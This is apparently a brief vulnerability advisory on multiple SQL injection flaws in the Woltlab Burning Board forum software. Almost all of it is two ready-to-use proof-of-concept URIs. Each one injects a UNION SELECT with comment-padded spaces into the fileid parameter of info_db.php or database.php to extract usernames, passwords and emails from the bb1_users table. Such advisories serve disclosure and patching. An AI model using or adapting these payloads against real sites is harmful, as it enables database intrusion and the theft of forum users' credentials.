Woltlab Burning Board Multiple SQL Injection Vulnerabilities

Woltlab Burning Board Multiple SQL Injection Vulnerabilities

These issues can be exploited through use of a web client.

The following proof of concept URI are available:

http://www.example.com[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1

http://www.example.com/[WBBDir]/database.php?
action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1